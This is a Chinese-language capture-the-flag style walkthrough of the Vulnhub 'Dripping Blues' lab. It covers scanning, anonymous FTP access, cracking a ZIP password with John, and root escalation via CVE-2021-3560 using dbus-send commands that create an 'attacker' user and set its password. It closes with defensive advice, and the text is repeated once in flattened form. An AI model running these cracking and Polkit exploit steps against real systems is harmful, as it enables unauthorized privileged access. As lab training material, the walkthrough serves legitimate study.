vulnhub系列4——Dripping Blues
字数 980 2025-08-12 11:34:31

Dripping Blues 靶场实战指南

靶场概述

Dripping Blues 是 Vulnhub 上的一个渗透测试靶场,难度中等,涉及 FTP 匿名登录、文件包含漏洞、密码破解和权限提升等技术点。

环境准备

  • 靶机 IP: 192.168.56.109
  • 攻击机: Kali Linux 或其他渗透测试系统

渗透测试步骤

1. 信息收集

网络扫描

netdiscover -r 192.168.56.0/24
nmap -sV -Pn -sC 192.168.56.109

发现的服务

  • FTP 服务(允许匿名登录)
  • HTTP 服务(80端口)

2. FTP 匿名登录

ftp 192.168.56.109

使用用户名 anonymous 和空密码登录。

下载文件

在 FTP 中发现一个需要密码的 ZIP 压缩包:

get respectmydrip.zip

3. Web 目录枚举

发现三个重要文件:

  • robots.txt
  • dripisreal.txt
  • /etc/dripispowerful.html

4. ZIP 密码破解

使用 zip2johnjohn 破解 ZIP 密码:

zip2john /root/Desktop/respectmydrip.zip >> pass.txt
john /root/Desktop/pass.txt

成功获取密码: 072528035

5. 解压 ZIP 文件

unzip respectmydrip.zip

输入密码 072528035 解压文件。

6. 分析解压文件

查看解压后的文件内容,可能包含 SSH 凭据或其他有用信息。

7. SSH 登录

从解压文件中获取账号密码后:

ssh username@192.168.56.109

8. 权限提升

使用 CVE-2021-3560 漏洞进行提权:

漏洞利用步骤

  1. 确保系统满足漏洞条件(Polkit 版本受影响)
  2. 执行漏洞利用代码:
# 示例利用代码(需根据实际情况调整)
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Attacker" int32:1
  1. 为新创建的用户设置密码:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$hashedpassword' string:AskPassword
  1. 切换到 root 权限:
su - attacker
sudo -i

关键点总结

  1. FTP 匿名登录:总是检查 FTP 是否允许匿名访问
  2. 密码保护文件:使用 zip2john + john 组合破解 ZIP 密码
  3. Web 目录枚举:robots.txt 和非常规路径可能泄露敏感信息
  4. 权限提升:CVE-2021-3560 是 Polkit 提权漏洞,影响多个 Linux 发行版

防御建议

  1. 禁用 FTP 匿名登录
  2. 对敏感文件使用强密码
  3. 及时更新系统补丁,修复已知漏洞
  4. 限制 Polkit 等系统服务的权限

参考资源

  • CVE-2021-3560 详细说明:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560
  • Polkit 漏洞利用指南:https://github.com/berdav/CVE-2021-3560
Dripping Blues 靶场实战指南 靶场概述 Dripping Blues 是 Vulnhub 上的一个渗透测试靶场,难度中等,涉及 FTP 匿名登录、文件包含漏洞、密码破解和权限提升等技术点。 环境准备 靶机 IP: 192.168.56.109 攻击机: Kali Linux 或其他渗透测试系统 渗透测试步骤 1. 信息收集 网络扫描 发现的服务 FTP 服务(允许匿名登录) HTTP 服务(80端口) 2. FTP 匿名登录 使用用户名 anonymous 和空密码登录。 下载文件 在 FTP 中发现一个需要密码的 ZIP 压缩包: 3. Web 目录枚举 发现三个重要文件: robots.txt dripisreal.txt /etc/dripispowerful.html 4. ZIP 密码破解 使用 zip2john 和 john 破解 ZIP 密码: 成功获取密码: 072528035 5. 解压 ZIP 文件 输入密码 072528035 解压文件。 6. 分析解压文件 查看解压后的文件内容,可能包含 SSH 凭据或其他有用信息。 7. SSH 登录 从解压文件中获取账号密码后: 8. 权限提升 使用 CVE-2021-3560 漏洞进行提权: 漏洞利用步骤 确保系统满足漏洞条件(Polkit 版本受影响) 执行漏洞利用代码: 为新创建的用户设置密码: 切换到 root 权限: 关键点总结 FTP 匿名登录 :总是检查 FTP 是否允许匿名访问 密码保护文件 :使用 zip2john + john 组合破解 ZIP 密码 Web 目录枚举 :robots.txt 和非常规路径可能泄露敏感信息 权限提升 :CVE-2021-3560 是 Polkit 提权漏洞,影响多个 Linux 发行版 防御建议 禁用 FTP 匿名登录 对敏感文件使用强密码 及时更新系统补丁,修复已知漏洞 限制 Polkit 等系统服务的权限 参考资源 CVE-2021-3560 详细说明:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560 Polkit 漏洞利用指南:https://github.com/berdav/CVE-2021-3560